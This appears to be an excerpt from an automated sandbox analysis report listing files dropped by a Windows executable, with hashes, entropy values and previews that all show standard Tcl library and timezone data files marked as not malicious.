                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):780
                                                                                                                                                                                                                              Entropy (8bit):4.716025632367214
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                                                                                                              MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                                                                                                              SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                                                                                                              SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                                                                                                              SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):347
                                                                                                                                                                                                                              Entropy (8bit):5.062880051437783
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                                                                                                              MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                                                                                                              SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                                                                                                              SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                                                                                                              SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):354
                                                                                                                                                                                                                              Entropy (8bit):5.124064818715749
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                                                                                                              MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                                                                                                              SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                                                                                                              SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                                                                                                              SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33777
                                                                                                                                                                                                                              Entropy (8bit):4.60013086740989
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                                                                                                              MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                                                                                                              SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                                                                                                              SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                                                                                                              SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):620
                                                                                                                                                                                                                              Entropy (8bit):4.702477618616754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                                                                                                              MD5:07532085501876DCC6882567E014944C
                                                                                                                                                                                                                              SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                                                                                                              SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                                                                                                              SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23995
                                                                                                                                                                                                                              Entropy (8bit):4.884828325514459
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                                                                                                              MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                                                                                                              SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                                                                                                              SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                                                                                                              SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):844
                                                                                                                                                                                                                              Entropy (8bit):4.883013702569192
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                                                                                                              MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                                                                                                              SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                                                                                                              SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                                                                                                              SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42223
                                                                                                                                                                                                                              Entropy (8bit):4.822635446297551
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                                                                                                              MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                                                                                                              SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                                                                                                              SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                                                                                                              SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5617
                                                                                                                                                                                                                              Entropy (8bit):4.747404679682368
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                                                                                                              MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                                                                                                              SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                                                                                                              SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                                                                                                              SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12204
                                                                                                                                                                                                                              Entropy (8bit):4.763796758810551
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                                                                                                              MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                                                                                                              SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                                                                                                              SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                                                                                                              SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):147
                                                                                                                                                                                                                              Entropy (8bit):4.995501022397479
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2DcsBdNMXGm2OHnFvpsYoHsdSalHFLwy:SlSWB9eg/2DBpDm2OHnFvmYoH1alHOy
                                                                                                                                                                                                                              MD5:FF8B5540631A6EE93507338C4E7AA49D
                                                                                                                                                                                                                              SHA1:817B261A1B6B92AA498EC286349964EA10FB5A84
                                                                                                                                                                                                                              SHA-256:7213997BB9CF9D384A7002B8C8EFEF25C01ABA6083D9835A16D583D5DCEE40A0
                                                                                                                                                                                                                              SHA-512:8D78AC4868ED0013EDA536C0E82E0E91398772AA18C637AEFE22F24B142FCDA55A4CB853B2282951E907C9E2F62BD3F831A5CF995F52898F5225D16889943A9C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Abidjan) {.. {-9223372036854775808 -968 0 LMT}.. {-1830383032 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.832432925672155
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dc9XfBQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DUGDBS
                                                                                                                                                                                                                              MD5:52FDFD3DB98475FBBB620D0D5565C5CC
                                                                                                                                                                                                                              SHA1:C7750452859663605272553DBEE0B6C134E1517C
                                                                                                                                                                                                                              SHA-256:6040827AFED8CEF45F252FBD7E3E862C0B5E9D06C1C98C58BAD61DFE67BD57CC
                                                                                                                                                                                                                              SHA-512:2FF9D96D81279148A86BE208FEEACCBCB8B4224D093D6C092ECD1C4EA2186589CCF947027D3A726600C703611B4CFEE029AA14ED3E8593C477B427C4F342CF27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Accra) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.817170256300069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DczqIVDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DnaDkO
                                                                                                                                                                                                                              MD5:30CDD4D37E9DD60FBF6D754C9343F364
                                                                                                                                                                                                                              SHA1:56F896C21068764B7B8F884F374B18913CA3D9CA
                                                                                                                                                                                                                              SHA-256:E11FD8AD8572B684333810CFDC23B92E1ACF619875866985E288D92F8277D07F
                                                                                                                                                                                                                              SHA-512:78FC8043CCE25713404E70996229E5EA8238BF5C0F59029064EDA5494E2D4F54398931F3D855E30C82B2C53B789C40EE4CBF09D0F98C2BA6734595D4AA75017A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1080
                                                                                                                                                                                                                              Entropy (8bit):4.187497782275587
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862D7nmdHh5Cv6/lHY8SOSuvvzXipFSgSO5vW5aKmvbsF6VWsXN87QBWcAFy:5veSvKlHYXNujXipFSjKRKXiWsXCGWJy
                                                                                                                                                                                                                              MD5:E8D3DF11CE0E7575485573FA07D955D5
                                                                                                                                                                                                                              SHA1:3B2C00C85B6C0BFAA1C676C970D6DF1B4BDC3D4A
                                                                                                                                                                                                                              SHA-256:E6874647561CE1C5FD1F650C9B167F77AC5B24FD2026046399A9043CF998E5C4
                                                                                                                                                                                                                              SHA-512:E2968BE847622CF243C0E498436FD21BDC2E1DF0FD8D694F2C70569D17CE896CDE4968BB8ABDEF9F687439E4EA2D955AE87D6C15E81F881EE1413416A90765D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Algiers) {.. {-9223372036854775808 732 0 LMT}.. {-2486592732 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1531443600 0 0 WET}.. {-956365200 3600 1 WEST}.. {-950486400 0 0 WET}.. {-942012000 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796262400 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766630800 3600 0 CET}.. {-733280400 0 0 WET}.. {-439430400 3600 0 CET}.. {-212029200 0 0 WET}.. {41468400 3600 1 WEST}.. {54774000 0 0 WET}.. {231724800 3600 1 WEST}.. {246240000 3600 0 CET}.. {259545600 7200 1 CEST}.. {275274000 3600 0 CET}.. {309740400 0 0 WET}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.801054282631739
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjEUEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DGs+DR
                                                                                                                                                                                                                              MD5:A543BDEB3771017421FB75231F0004F2
                                                                                                                                                                                                                              SHA1:D682C58C27562FF3ABAB8EDE8EB6EA754DA7C02E
                                                                                                                                                                                                                              SHA-256:064EB7F9A1FA05A317C6BDCA6B102BC1560D980758F9E4DDB010C9E7DC068ECB
                                                                                                                                                                                                                              SHA-512:44848D60EDC79AF784A819714C0D9F62DCCB6329B47F25D74AB8C174BF9EC3F783C66FEB27F588A93FABA9BECAF076F453D6D797CE4F28461F7AE69440EA54C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.806258322241929
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjAWDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2D8DkOn
                                                                                                                                                                                                                              MD5:1B5E386E7A2F10D9385DE4C5683EBB85
                                                                                                                                                                                                                              SHA1:FECBA599C37493D2E0AEE8E21BAB40BF8E8DC82A
                                                                                                                                                                                                                              SHA-256:76939852A98EA7BF156D0AC18B434CC610DAF5232322C0FBB066CD52C5B72AF7
                                                                                                                                                                                                                              SHA-512:B36FABFCDB2187A3A4A211C8E033D96C91E3C4D47907D284E10786555562C82231566033EAB4753EF1E48DF1233CFC8C6C0FB3CA50748BE0B2554A972A88FBA0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.883634030944169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcxAQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwNDBS
                                                                                                                                                                                                                              MD5:6B9BB5B37C41AA727E31BF03483DC1CA
                                                                                                                                                                                                                              SHA1:CB3BBA37B063EA4A54CD15C6E30C14D8CA30D3C0
